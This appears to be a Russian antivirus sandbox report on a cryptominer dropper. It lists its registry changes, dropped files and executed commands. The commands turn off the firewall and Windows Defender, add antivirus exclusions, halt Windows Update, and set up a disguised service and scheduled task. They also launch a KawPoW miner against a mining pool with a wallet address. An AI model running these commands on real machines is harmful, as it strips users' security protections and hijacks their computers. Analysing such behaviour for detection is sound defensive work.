Техническая информация
- [HKLM\System\CurrentControlSet\Services\GoogleUpdateTaskMachineQC] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\GoogleUpdateTaskMachineQC] 'ImagePath' = '%ALLUSERSPROFILE%\Google\Chrome\updater.exe'
- 'GoogleUpdateTaskMachineQC' %ALLUSERSPROFILE%\Google\Chrome\updater.exe
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- Системный антивирус (Защитник Windows)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
- '%WINDIR%\syswow64\netsh.exe' Advfirewall set allprofiles state off
- '%WINDIR%\syswow64\net.exe' stop windefend
- '<SYSTEM32>\taskkill.exe' /F /FI "imagename eq Windows Protection.exe"
- '<SYSTEM32>\taskkill.exe' /F /FI "imagename eq Windows Process.exe"
- %TEMP%\aut27ea.tmp
- %ALLUSERSPROFILE%\defender\c1.exe
- %TEMP%\aut23c5.tmp
- %ALLUSERSPROFILE%\task host\svchost.exe
- %TEMP%\aut2414.tmp
- %ALLUSERSPROFILE%\defender\windows protection.exe
- %TEMP%\aut25ba.tmp
- %ALLUSERSPROFILE%\defender\winring0x64.sys
- %TEMP%\aut25cb.tmp
- %ALLUSERSPROFILE%\defender\start.exe
- %TEMP%\aut25db.tmp
- %ALLUSERSPROFILE%\defender\start.vbs
- %TEMP%\aut25dc.tmp
- %ALLUSERSPROFILE%\defender\k.bat
- %TEMP%\aut25fd.tmp
- %ALLUSERSPROFILE%\defender\k.vbs
- %TEMP%\aut268a.tmp
- %ALLUSERSPROFILE%\defender\p.vbs
- %TEMP%\csc8bda.tmp
- %TEMP%\ezpflef5.out
- %TEMP%\ezpflef5.cmdline
- %TEMP%\ezpflef5.0.cs
- %TEMP%\41a1.tmp\41b2.tmp\41b3.bat
- %ALLUSERSPROFILE%\google\chrome\updater.exe
- %TEMP%\aut26fb.tmp
- %ALLUSERSPROFILE%\defender\windows process.exe
- %ALLUSERSPROFILE%\defender\timeout.ps1
- %TEMP%\aut26db.tmp
- %ALLUSERSPROFILE%\defender\s.bat
- %TEMP%\aut26ca.tmp
- %ALLUSERSPROFILE%\defender\s.vbs
- %TEMP%\aut26aa.tmp
- %TEMP%\res8beb.tmp
- %ALLUSERSPROFILE%\defender\ac.exe
- %TEMP%\aut803a.tmp
- %ALLUSERSPROFILE%\ntuser.pol
- %ALLUSERSPROFILE%\defender\config.json
- %TEMP%\aut280a.tmp
- %ALLUSERSPROFILE%\defender\ab.exe
- %TEMP%\aut29b0.tmp
- %ALLUSERSPROFILE%\defender\midnight.exe
- %ALLUSERSPROFILE%\defender\dc.ini
- %ALLUSERSPROFILE%\defender\dd.bat
- %ALLUSERSPROFILE%\defender\ddd.bat
- %ALLUSERSPROFILE%\defender\dc.exe
- %ALLUSERSPROFILE%\defender\dd.vbs
- %TEMP%\aut68a4.tmp
- %ALLUSERSPROFILE%\defender\ac1.exe
- %ALLUSERSPROFILE%\defender\a.exe
- %ALLUSERSPROFILE%\defender\crdllunload32.dll
- %ALLUSERSPROFILE%\defender\crdllunload64.dll
- %ALLUSERSPROFILE%\defender\d.exe
- %ALLUSERSPROFILE%\defender\d.vbs
- <SYSTEM32>\grouppolicy\user\registry.pol
- <SYSTEM32>\grouppolicy\gpt.ini
- <SYSTEM32>\grouppolicy\machine\registry.pol
- %WINDIR%\syswow64\grouppolicy\gpt.ini
- %ALLUSERSPROFILE%\defender\w.bat
- %ALLUSERSPROFILE%\defender\v.bat
- %ALLUSERSPROFILE%\defender\usrfindhandle32.sys
- %ALLUSERSPROFILE%\defender\usrfindhandle64.sys
- %ALLUSERSPROFILE%\defender\u.exe
- %ALLUSERSPROFILE%\defender\t.vbs
- %ALLUSERSPROFILE%\defender\t.bat
- %ALLUSERSPROFILE%\defender\l.ini
- %ALLUSERSPROFILE%\defender\l.exe
- %ALLUSERSPROFILE%\defender\d1.exe
- %HOMEPATH%\ntuser.pol
- %TEMP%\ezpflef5.dll
- %HOMEPATH%\tempntuser.pol
- %ALLUSERSPROFILE%\tempntuser.pol
- %TEMP%\aut27ea.tmp
- %TEMP%\ezpflef5.0.cs
- %TEMP%\ezpflef5.dll
- %TEMP%\ezpflef5.pdb
- %TEMP%\csc8bda.tmp
- %TEMP%\res8beb.tmp
- %TEMP%\41a1.tmp\41b2.tmp\41b3.bat
- %TEMP%\aut26fb.tmp
- %TEMP%\aut26db.tmp
- %TEMP%\aut26ca.tmp
- %TEMP%\aut26aa.tmp
- %TEMP%\aut268a.tmp
- %TEMP%\ezpflef5.out
- %TEMP%\aut25fd.tmp
- %TEMP%\aut25db.tmp
- %TEMP%\aut25cb.tmp
- %TEMP%\aut25ba.tmp
- %TEMP%\aut2414.tmp
- %TEMP%\aut23c5.tmp
- %ALLUSERSPROFILE%\tempntuser.pol
- %TEMP%\aut803a.tmp
- %HOMEPATH%\tempntuser.pol
- %TEMP%\aut68a4.tmp
- %TEMP%\aut29b0.tmp
- %TEMP%\aut280a.tmp
- %TEMP%\aut25dc.tmp
- %TEMP%\ezpflef5.cmdline
- %HOMEPATH%\ntuser.pol в %HOMEPATH%\tempntuser.pol
- %ALLUSERSPROFILE%\ntuser.pol в %ALLUSERSPROFILE%\tempntuser.pol
- %HOMEPATH%\ntuser.pol
- %HOMEPATH%\tempntuser.pol
- %ALLUSERSPROFILE%\ntuser.pol
- %ALLUSERSPROFILE%\tempntuser.pol
- '17#.#11.238.165':5500
- ClassName: 'EDIT' WindowName: ''
- '%ALLUSERSPROFILE%\defender\ab.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%ALLUSERSPROFILE%\defender\c1.exe'
- '%ALLUSERSPROFILE%\defender\windows protection.exe'
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\p.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy Unrestricted %ALLUSERSPROFILE%\Defender\timeout.ps1
- '%ALLUSERSPROFILE%\task host\svchost.exe'
- '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k
- '%ALLUSERSPROFILE%\defender\start.exe'
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\k.vbs"
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\s.vbs"
- '%ALLUSERSPROFILE%\defender\midnight.exe'
- '%ALLUSERSPROFILE%\defender\d.exe' 70 %ALLUSERSPROFILE%\Defender\d1.exe
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\d.vbs"
- '%ALLUSERSPROFILE%\defender\u.exe'
- '%ALLUSERSPROFILE%\defender\ac.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%ALLUSERSPROFILE%\defender\ac1.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\dd.vbs"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8BEB.tmp" "%TEMP%\CSC8BDA.tmp"' (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\windows protection.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\k.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\t.bat" "' (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\d.exe' 70 %ALLUSERSPROFILE%\Defender\d1.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\s.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\41A1.tmp\41B2.tmp\41B3.bat %ALLUSERSPROFILE%\Defender\Start.exe"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ezpflef5.cmdline"' (со скрытым окном)
- '%ALLUSERSPROFILE%\task host\svchost.exe' ' (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k' (со скрытым окном)
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Task Host" /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Defender" /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\net1.exe' stop windefend
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\k.bat" "
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8BEB.tmp" "%TEMP%\CSC8BDA.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ezpflef5.cmdline"
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\s.bat" "
- '<SYSTEM32>\timeout.exe' /t 10
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\41A1.tmp\41B2.tmp\41B3.bat %ALLUSERSPROFILE%\Defender\Start.exe"
- '<SYSTEM32>\sc.exe' create "GoogleUpdateTaskMachineQC" binpath= "%ALLUSERSPROFILE%\Google\Chrome\updater.exe" start= "auto"
- '<SYSTEM32>\sc.exe' delete "GoogleUpdateTaskMachineQC"
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-ac 0
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\t.bat" "
- '<SYSTEM32>\svchost.exe' -k secsvcs
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN "Windows Protection" /TR "%ALLUSERSPROFILE%\Defender\Start.exe" /f